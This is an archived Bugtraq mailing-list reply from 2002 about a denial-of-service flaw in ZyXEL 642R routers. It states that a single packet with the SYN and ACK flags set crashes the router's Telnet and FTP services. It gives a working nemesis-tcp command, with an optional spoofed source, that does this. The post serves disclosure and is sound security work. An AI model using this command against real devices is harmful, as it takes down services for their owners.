[25828] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS -- 643R testing

daemon@ATHENA.MIT.EDU (Kistler Ueli)
Mon Jun 17 19:17:10 2002

Message-ID: <3D0E20AF.9080704@gmx.ch>
Date: Mon, 17 Jun 2002 19:47:27 +0200
From: Kistler Ueli <iuk@gmx.ch>
MIME-Version: 1.0
To: Bugtraq <Bugtraq@securityfocus.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

 Hello

there's no need to flood the router.. just send 1 single packet and it
crashs the remote service (works on telnet and FTP, dhcp not tested... ).
Example with nemesis:
nemesis-tcp -v -S %spoofed IP possible% -D %ZyXEL router% -fS -fA -y 23
This will send a packet with SYN/ACK flags set to port 23 (Telnet) to
the router (-v allows a stdout visual of current injected packet)

Regards,
  Ueli Kistler
  www.eclipse.fr.fm / iuk@gmx.ch
  www.packx.net / www.eclipse.fr.fm


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[25828] in bugtraq

Re: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS -- 643R testing

daemon@ATHENA.MIT.EDU (Kistler Ueli)Mon Jun 17 19:17:10 2002

daemon@ATHENA.MIT.EDU (Kistler Ueli)
Mon Jun 17 19:17:10 2002